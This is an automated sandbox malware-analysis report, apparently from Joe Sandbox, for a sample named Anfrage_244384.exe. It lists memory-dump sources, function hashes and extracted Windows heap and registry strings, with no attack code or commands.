lstrlenA.KERNEL32(00000000,?,00000000,00405BF8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059DD

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: a2c52c9a51a2c87d3959497fa160f4ebe8f2eb417ab2d749973a894cf6308a94
Instruction ID: a6643053d284366244d0af05be0bd1f2da836f60db037e8ed7330f0f38b612ff
Opcode Fuzzy Hash: a2c52c9a51a2c87d3959497fa160f4ebe8f2eb417ab2d749973a894cf6308a94
Instruction Fuzzy Hash: D6F06232105918EFD7029BA5DD0099FBBA8EF16360B2540BAE840F7210D674DE019BA9

Analysis Process: Anfrage_244384.exePID: 5608, Parent PID: 5308COMMON

Execution Graph

Execution Coverage:	0%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	100%
Total number of Nodes:	1
Total number of Limit Nodes:	0

Executed Functions

Function 346B35C0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 346B35CA

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ff8a0f66ad055161312fad87e418284005feef18de4103b0ba58a3b826d1294f
Instruction ID: 39db7cba04a5e05d81b084e8157e14619d8d75f9397a1704ffff287b2dbcb881
Opcode Fuzzy Hash: ff8a0f66ad055161312fad87e418284005feef18de4103b0ba58a3b826d1294f
Instruction Fuzzy Hash: 1090023160550402D1107999451471610058BD0206F65D412A0425528E8796CE5565A2

Function 346B2C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 346B2C7A

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a419f3ee350099a269526bb9ea39ebc3785e37323c55505cea979a06979655c0
Instruction ID: f01264c3736837e0e9968d12d6bbcf9ac5f5c2ce9423e6825f643939597bcfa0
Opcode Fuzzy Hash: a419f3ee350099a269526bb9ea39ebc3785e37323c55505cea979a06979655c0
Instruction Fuzzy Hash: 7A90023120148802D1207999840475A00058BD0306F59D412A4425618E8696CD957121

Function 346B2DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 346B2DFA

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2bf53825079ffa8fcd61d143ee928271621a5955e07df044aaf646d9c2cc5829
Instruction ID: aaeda96a5d48e94fb12ab62fa401b8a92384820e616e5e41415a3af11a7e9396
Opcode Fuzzy Hash: 2bf53825079ffa8fcd61d143ee928271621a5955e07df044aaf646d9c2cc5829
Instruction Fuzzy Hash: 3590023120140413D1217999450471700098BD0246F95D413A0425518E9657CE56A121

Non-executed Functions

Function 3472FCAB Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Parameter1: %p, xrefs: 3472FE01
HEAP[%wZ]: , xrefs: 3472FCD5, 3472FD9C, 3472FDE7, 3472FE30, 3472FE79, 3472FECA, 3472FF12
heap_failure_virtual_block_corruption, xrefs: 3472FD36
Heap error detected at %p (heap handle %p), xrefs: 3472FCF5
heap_failure_invalid_allocation_type, xrefs: 3472FD59
Error code: %d - %s, xrefs: 3472FDB7
heap_failure_internal, xrefs: 3472FD13
heap_failure_freelists_corruption, xrefs: 3472FD6E
heap_failure_multiple_entries_corruption, xrefs: 3472FD2F
heap_failure_generic, xrefs: 3472FD21
heap_failure_block_not_busy, xrefs: 3472FD4B
heap_failure_listentry_corruption, xrefs: 3472FD75
HEAP: , xrefs: 3472FCBB, 3472FCE2, 3472FDA9, 3472FDF4, 3472FE3D, 3472FE86, 3472FED7, 3472FF1F
heap_failure_buffer_overrun, xrefs: 3472FD3D
heap_failure_entry_corruption, xrefs: 3472FD28
heap_failure_buffer_underrun, xrefs: 3472FD44
heap_failure_invalid_argument, xrefs: 3472FD52
heap_failure_lfh_bitmap_mismatch, xrefs: 3472FD7C
Parameter3: %p, xrefs: 3472FE93
heap_failure_unknown, xrefs: 3472FD1A
heap_failure_cross_heap_operation, xrefs: 3472FD67
heap_failure_usage_after_free, xrefs: 3472FD60
Last known valid blocks: before - %p, after - %p, xrefs: 3472FEEA
Parameter2: %p, xrefs: 3472FE4A
Stack trace available at %p, xrefs: 3472FF2B

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 161ac1077bbfb437ff9f34809b58d2be782baec79856216a85b695fad6be762c
Instruction ID: cb03c745b59051b97e3848dd9e36eefc8583511878bcb560faed80380e435e5e
Opcode Fuzzy Hash: 161ac1077bbfb437ff9f34809b58d2be782baec79856216a85b695fad6be762c
Instruction Fuzzy Hash: 1261C172A16751DFE3419F54C494E2173E9EB0AA3CB05406EE9029F752CA3DEC82DE4D

Function 347194E0 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDebugPrintTimes.NTDLL ref: 34719688
RtlDebugPrintTimes.NTDLL ref: 34719727
RtlDebugPrintTimes.NTDLL ref: 34719807
RtlDebugPrintTimes.NTDLL ref: 347198E5
RtlDebugPrintTimes.NTDLL ref: 347199EA
RtlDebugPrintTimes.NTDLL ref: 34719A81
RtlDebugPrintTimes.NTDLL ref: 34719B94
RtlDebugPrintTimes.NTDLL ref: 34719CFC

Strings

0, xrefs: 34719BF6
, xrefs: 34719AD7
, xrefs: 34719B84

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $ $0
API String ID: 3446177414-3352262554
Opcode ID: a6d530347a1ca0f261d01aa33f11f8df816983889794aed5015801d8372e5ea7
Instruction ID: cd93f6d91c93b9480ccfa7a0b50f8d0d24279bf4e452b4ae68673c1ffcff0569
Opcode Fuzzy Hash: a6d530347a1ca0f261d01aa33f11f8df816983889794aed5015801d8372e5ea7
Instruction Fuzzy Hash: 5D3203B16083818FE310CF69C484B9BBBE5BB88344F14492EF59A8B350DB75D94ACF56

Function 34720274 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDebugPrintTimes.NTDLL ref: 347202A8

Strings

About to reallocate block at %p to %Ix bytes, xrefs: 347203BA
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 3472069F
HEAP[%wZ]: , xrefs: 34720399, 347204A8, 347205D0, 34720675, 347206CC
Just reallocated block at %p to %Ix bytes, xrefs: 347205F1
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 347206EA
RtlReAllocateHeap, xrefs: 347202BF, 34720362
HEAP: , xrefs: 347203A6, 347204B5, 347205DD, 34720682, 347206D9
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 347204D3

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 3446177414-1700792311
Opcode ID: 4ea2ab9bbcbaf79928d5b6ca7b0a5c3597a8a14486e027fac5a020e93d4d296f
Instruction ID: 6ba3fc65dca35a1b8528d2d61662fc8d31e4b052cb4045a4959186e112e9fd8c
Opcode Fuzzy Hash: 4ea2ab9bbcbaf79928d5b6ca7b0a5c3597a8a14486e027fac5a020e93d4d296f
Instruction Fuzzy Hash: F5D1DC35500685DFEB01CF68C444AAABBF6FF4A714F04805DE546AF752CB39A981CF68

Function 3466D34C Relevance: 12.8, Strings: 10, Instructions: 312COMMON

Download Yara Rule

Strings

PreferredUILanguagesPending, xrefs: 346CA8DE
MachinePreferredUILanguages, xrefs: 3466D685
@, xrefs: 3466D3E9
PreferredUILanguages, xrefs: 3466D4B8, 3466D4C5
Control Panel\Desktop, xrefs: 3466D45D
@, xrefs: 3466D49D
@, xrefs: 3466D663
Control Panel\Desktop\MuiCached, xrefs: 3466D62B
H/i4, xrefs: 3466D5CA
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3466D3B6

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$H/i4$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
API String ID: 0-254365235
Opcode ID: 8be59d076ca706a609c21528669ca80f4511fd2a1f2610fdd16b4199f7edd8d3
Instruction ID: 65df8cb386e01be9498c4ee026326c957528c7112e025e6e8c1a1b6dba1e7a54
Opcode Fuzzy Hash: 8be59d076ca706a609c21528669ca80f4511fd2a1f2610fdd16b4199f7edd8d3
Instruction Fuzzy Hash: AFB17BB56083519FE711CF24C880B5BB7E9EB98758F41492EF88AE7241DB34DD488B92

Function 3471F525 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3471F556

Strings

Just allocated block at %p for %Ix bytes, xrefs: 3471F708
HEAP[%wZ]: , xrefs: 3471F6E7, 3471F794, 3471F7EB
RtlAllocateHeap, xrefs: 3471F56D
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 3471F809
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 3471F7BE
HEAP: , xrefs: 3471F6F4, 3471F7A1, 3471F7F8

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 3446177414-1745908468
Opcode ID: 668b5cd83473d9252476a06e29c490b3490cbd992cbd540df4fe6aa35f40cdd3
Instruction ID: 9eb34445816de4f35ef3d39e70e7074dec2cf84bd5eac8f1fef9ae5f81ac0e5c
Opcode Fuzzy Hash: 668b5cd83473d9252476a06e29c490b3490cbd992cbd540df4fe6aa35f40cdd3
Instruction Fuzzy Hash: EE91BC75A00641DFEB01CF68C440AA9BBF6FF4A714F54805EE445AB762CB399982CF18

Function 3469D7B0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 151timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3469D959

Part of subcall function 34674859: RtlDebugPrintTimes.NTDLL ref: 346748F7

Strings

Process 0x%p (%wZ) exiting, xrefs: 346DF2C7
minkernel\ntdll\ldrinit.c, xrefs: 346DF2D8
LdrShutdownProcess, xrefs: 346DF2CE
$, xrefs: 3469D900
$, xrefs: 3469D86D
svchost.exe, xrefs: 3469D864

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c$svchost.exe
API String ID: 3446177414-4233992497
Opcode ID: a77c419e6173d8e170e2183daa68d7ff5b8f06017663fb0027c11bc3307424f5
Instruction ID: ec183ebc44b41a1312490f830fdcf345dbba831e71c00b152422617dc6bbc4c5
Opcode Fuzzy Hash: a77c419e6173d8e170e2183daa68d7ff5b8f06017663fb0027c11bc3307424f5
Instruction Fuzzy Hash: 8051BBB5A00345DFEB04DFA4C6847DDBBF2FB48354F244169D8046B292D7B8A882CF95

Function 347212ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON

Download Yara Rule

Strings

Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 347218A5
Heap block at %p is not last block in segment (%p), xrefs: 347217B7
HEAP[%wZ]: , xrefs: 347216CD, 347216F9, 34721749, 3472179B, 347217FC, 34721840, 347218D9
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 3472186B
Heap block at %p has corrupted PreviousSize (%lx), xrefs: 3472176D
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 347218F8
Heap block at %p has incorrect segment offset (%x), xrefs: 3472181A
Free Heap block %p modified at %p after it was freed, xrefs: 3472171B
HEAP: , xrefs: 34721706, 34721756, 347217A8, 34721809, 3472184D, 34721895, 347218E6

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 0-3591852110
Opcode ID: 92e19378af6d3e561266649884844f69b83dcd2f1f1b67f8a646d6e4128441a0
Instruction ID: d2d04afbebddffcbf5a323add8b1acbf3f835be9147a53227fbf9bb2060fc80a
Opcode Fuzzy Hash: 92e19378af6d3e561266649884844f69b83dcd2f1f1b67f8a646d6e4128441a0
Instruction Fuzzy Hash: 54128B74600742EFE7158F25C494BAABBE6FF09714F54849DE4868FB42DB38E981CB90

Function 3466D08D Relevance: 11.5, Strings: 9, Instructions: 249COMMON

Download Yara Rule

Strings

H/i4, xrefs: 346CA843
@, xrefs: 3466D0FD
@, xrefs: 3466D313
Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3466D146
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3466D2C3
Control Panel\Desktop\LanguageConfiguration, xrefs: 3466D196
Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3466D262
@, xrefs: 3466D2AF
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3466D0CF

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$H/i4$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
API String ID: 0-3399112313
Opcode ID: a7dcd75d73d2a4379724c97ad77cbd19bc2321947e19fd2d3310bfd9eb9b88b0
Instruction ID: 9a0410de4ee5d1f9714e77cfdda2d932c7dc01132b3c4f3211045799dee8c366
Opcode Fuzzy Hash: a7dcd75d73d2a4379724c97ad77cbd19bc2321947e19fd2d3310bfd9eb9b88b0
Instruction Fuzzy Hash: 98A17EB1908345DFE721CF25C884B5BB7E8FB84769F40492EE589A6241D778D908CF93

Function 34681070 Relevance: 11.4, APIs: 2, Strings: 4, Instructions: 940timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 346D5672

Strings

@, xrefs: 346D5A53
HEAP[%wZ]: , xrefs: 346D5877
!(CheckedFlags & ~HEAP_CREATE_VALID_MASK), xrefs: 346D588F
HEAP: , xrefs: 346D5884

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
API String ID: 3446177414-3570731704
Opcode ID: 067fd79ab44660c5cbf1835e58cabc364a4278c097afa4798ecca6e0af6efdb5
Instruction ID: f4c9972dc0677e7f1aa8520b180e3c389a11e94ba7e638cff115b892059fd95e
Opcode Fuzzy Hash: 067fd79ab44660c5cbf1835e58cabc364a4278c097afa4798ecca6e0af6efdb5
Instruction Fuzzy Hash: 86925875A01368CFEB24CF18CC50B99B7B6BF45354F0582EAD949AB291DB309E80CF56

Function 3471FD78 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3471FDAE

Strings

RtlFreeHeap, xrefs: 3471FDC8, 3471FE32
About to free block at %p, xrefs: 3471FE8A
About to free block at %p with tag %ws, xrefs: 3471FF7E
HEAP[%wZ]: , xrefs: 3471FE6C, 3471FF57
HEAP: , xrefs: 3471FE79, 3471FF64

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID: DebugPrintTimes
String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
API String ID: 3446177414-3492000579
Opcode ID: 80d022e84400972ca519a996731301eab7130957a8200f5393ebdf360db1b08e
Instruction ID: 038bf724ad42e473cf08da4f7c691d882c0dc7ca3cf085e6e3936bef6c6290b6
Opcode Fuzzy Hash: 80d022e84400972ca519a996731301eab7130957a8200f5393ebdf360db1b08e
Instruction Fuzzy Hash: 0171DE71A01684DFEB01CF68C440AADFBF6FF4A714F04805AE445AB352CB799986CB58

Function 34709179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON

Download Yara Rule

Strings

\BaseNamedObjects, xrefs: 3470949E
BaseNamedObjects, xrefs: 34709477, 3470947C
%s\%u-%u-%u-%u, xrefs: 34709422
AppContainerNamedObjects, xrefs: 3470946E, 347094D6
\Sessions, xrefs: 34709488
Global\Session\%ld%s, xrefs: 347094C5
%s\%ld\%s, xrefs: 3470948D
\AppContainerNamedObjects, xrefs: 347094AB, 347094B9

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
API String ID: 0-3063724069
Opcode ID: 3de12fde0d2c6153ce8dec387a632115a895c5bf84a1ecbe61d8521ace836df6
Instruction ID: a50128cddbeb66fcc060bd1791b663c61892a37491a173f86e55a28c8c7cdf9e
Opcode Fuzzy Hash: 3de12fde0d2c6153ce8dec387a632115a895c5bf84a1ecbe61d8521ace836df6
Instruction Fuzzy Hash: 65D1A5F2806315AFE721CE54C840BABB7E9AF84754F41892DF984AB360D774C9488FD6

Function 3466F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON

Download Yara Rule

Strings

(LONG)FreeEntry->Size > 1, xrefs: 346CE291
(UCRBlock != NULL), xrefs: 346CDF6F
((LONG)FreeEntry->Size > 1), xrefs: 346CE0B3
(!TrailingUCR), xrefs: 346CE3A9
HEAP[%wZ]: , xrefs: 346CDF57, 346CE09B, 346CE279, 346CE391
HEAP: , xrefs: 346CDF64, 346CE0A8, 346CE286, 346CE39E

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: c99ae9d24fec4fa97d602c3a60e4385ea5be59d95b500296be77ec7ce120911e
Instruction ID: e8a46ba32cef70095966fc2becda5f9bf94dbce060e4765bf2f79a6cf780473e
Opcode Fuzzy Hash: c99ae9d24fec4fa97d602c3a60e4385ea5be59d95b500296be77ec7ce120911e
Instruction Fuzzy Hash: A242D075208781DFE305CF28C484A5ABBE9FF98748F04496DE4868B752DB38EC45CB56

Function 346951EF Relevance: 7.9, Strings: 6, Instructions: 434COMMON

Download Yara Rule

Strings

Kernel-MUI-Language-Disallowed, xrefs: 34695352
Kernel-MUI-Number-Allowed, xrefs: 34695247
Kernel-MUI-Language-Allowed, xrefs: 3469527B
H/i4, xrefs: 346954F0, 346954AF, 346DBC60, 346953DD, 346DBBFC, 34695304, 34695307, 346953E0, 346954B2, 346954F3, 346DBBFF, 346DBC63
WindowsExcludedProcs, xrefs: 3469522A
Kernel-MUI-Language-SKU, xrefs: 3469542B

Memory Dump Source

Source File: 00000004.00000002.3122274111.0000000034640000.00000040.00001000.00020000.00000000.sdmp, Offset: 34640000, based on PE: true

Associated: 00000004.00000002.3122274111.0000000034769000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.000000003476D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.3122274111.00000000347DE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_34640000_Anfrage_244384.jbxd

